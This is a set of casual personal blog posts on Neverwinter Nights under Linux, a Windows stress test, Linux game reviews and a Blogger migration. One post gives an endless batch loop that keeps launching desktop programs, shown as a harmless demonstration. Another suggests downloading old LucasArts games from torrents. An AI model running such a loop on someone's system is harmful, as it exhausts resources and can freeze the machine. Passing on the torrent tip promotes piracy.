Then everything worked perfectly fine: NWN starts and I can enter my CD keys, the game doesn't run like it does on my gaming machine, but I'm satisfied that it runs at all with such a small Thinkpad X60 with quite a crappy graphics chip.

Again: thanks to Bioware for making this available (which other game company would host a one-gigabyte file on their servers?).

Happy adventuring!

Grinding Windows (To A Halt?)

Some of you have probably read this post on Digg. Someone apperantly made a video about Edgy Eft running 40 processes without crashing.

Some people basically replied "Windows [and Linux] can do this for ages!" or like "This is really neat!".

It is really cool though that the Ubuntu team has managed to quickly open Openoffice (around 3 seconds now), I am really looking forward to see that running on my laptop.

However, I wanted to prove that Windows will also not crash when doing this (not a recent version that is). So here it is: my video response, using the following amazing batch script:

:loopit
start sol
start mspaint
start calc
start notepad
goto loopit

It's the loop of doom! Sorry for the bad quality, but it's better than YouTube. When I close the command line window, Windows was running around 140 instances of Notepad
, Paint, Solitaire and Calculator each (screenshots maybe later). However: during all this, it did slow down, but is was still quite manageable afterwards. I had to stop the loop because Paint was starting to spit out error messages (as you can see in the video).

Then, I closed the four groups from the taskbar. Windows seems to have a bug here: it doesn't close all programs and some had to be closed manually (ah the fun!).

On which system was all this done: on my main Desktop/beast machine: two Opterons and 4GB of RAM, so I agree that this is in fact not really fair towards that first Linux-video, but it was a fun thing to do (I was surprised that Camtasia could survive the heavy load).

In conclusion: I do not want to flame Ubuntu or Linux in general (I am running it myself so...), but running 40 processes at once is not such a formidable feat. Also: Windows is more stable than Mac/Linux/Whatever-zealots tend to believe[1].

A, those lazy Sundays...

[1]: Except for Windows 3.1. And 95. And 98. 98SE too, a little. And ME. Especially ME. Stay away from ME... 2000 might work I think. Windows XP 32 bit too (I was running 64bit). And 2003 probably too.

Linux Games

I've been checking out some games for my Linux machine recently (that almost sounds like an oxymoron). I'm not going to go all whiny on you with a "Linux does have games!"-post, but will just review a few of them (the most popular ones).

• Planet Penguin Racer (a fork of Tux Racer): I never wanted this game, when all those Linux-sites/posts/magazines said: "hey look we have a racing game with a penguin" it just looked too kidish. However: it is quite entertainable, and making some maps is quite fun. This is a nice quickie-game for the people with direct 3d rendering enabled ;).
• Neverball: a game where you tilt the play field to make a ball roll and pick up coins. It's fun and looks quite nice but I suck at it.
• Freecraft: it's an RTS, with poor graphics (sorry), I didn't like it that much and wish there was a good RTS game for Linux. I don't have anything against sprites (I loved Age of Empires 1 and 2, Age of Wonders, Starcraft, Kohan, etc...), but this can look better.
  
• Globulation 2: also an RTS. Also not bad but I don't like it that much.
• Tuxkart: fun for a while but not fantastic.
• Frozen Bubble: the game everyone knows, and still great fun too!
• Pingus: a Lemmings clone. Well done game, will keep the oldskool puzzlers really entertained!
• Rocks And Diamonds: an all-in-one Boulderdash clone. Which I absolutely love because I can even play the Supaplex levels.
• Wesnoth: another instant-classic, hexgrid fantasy strategy game, well done graphics and great tactical fun both online and offline.
• Crimson Fields: Battle Isle clone, not bad but the graphics aren't that great.
• Advanced Strategic Command: also a Battle Isle clone: better (traditional) graphics and AI, but the interface/polishing could be better.
• SCUMMVM: absolute favorite. Grab this program together with some fat old-Lucasarts-adventures torrents and relive all those classics... A fantastic game for those long train-trips. Ah... the memories of playing Broken Sword 2 and really diggin' the characters and story. They don't make such games anymore since Grim Fandago[1].

That's it. It's not F.E.A.R., no Civilization 4, no GTA and no Age of Empires 3, but it is enough to kill a few minutes. After all, my Linux computer is my work machine, so the less I play, the more work I get done...

[1]: Actually I'm lying: Dreamfall, Fahrenheit (a.k.a. Indigo Prophecy) and others are great recent adventure games.

Combat, New Blogger And A Farewell...

A farewell to Windows that is. Which I removed now from my laptop (since I'm so pleased with Ubuntu).

Of course I still have Windows on my gaming-slash-desktop machine. Playing a bit of Flatout 2 lately. I tried to download the F.E.A.R. Combat installer (multiplayer component of F.E.A.R. which is now released for free). But after installing and trying to run it quit with a nice ugly error... so no Combat for me until I sort this out.

I've been reading about the new Blogger and their closed beta. Pity for me. Until today: I accidently logged in with my Google account name and password and *poof*: it gave me an option to migrate. I picked a new template to try some things (I actually like this one now). The new templating system is quite cool: it is really easy to arrange items and pick fonts and colors.

I see that there is now an option set labels too for a post (which is a fancy name for "tags") which means I don't have to use the Technorati ones anymore...

That was all folks... more later.